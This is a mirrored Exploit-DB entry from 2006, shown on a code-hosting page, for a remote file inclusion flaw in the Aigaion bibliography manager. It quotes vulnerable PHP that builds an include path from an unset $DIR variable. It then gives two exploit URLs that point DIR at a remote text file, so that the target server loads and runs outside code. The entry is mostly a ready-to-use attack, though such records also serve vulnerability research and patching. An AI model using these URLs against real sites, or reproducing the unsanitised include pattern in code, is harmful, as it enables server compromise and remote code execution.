bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/2777.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
1.1 KiB
Text
Raw Blame History

Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:
//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php");
/* This function leads the browser to the given location */
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# milw0rm.com [2006-11-14]
Reference in a new issue View git blame Copy permalink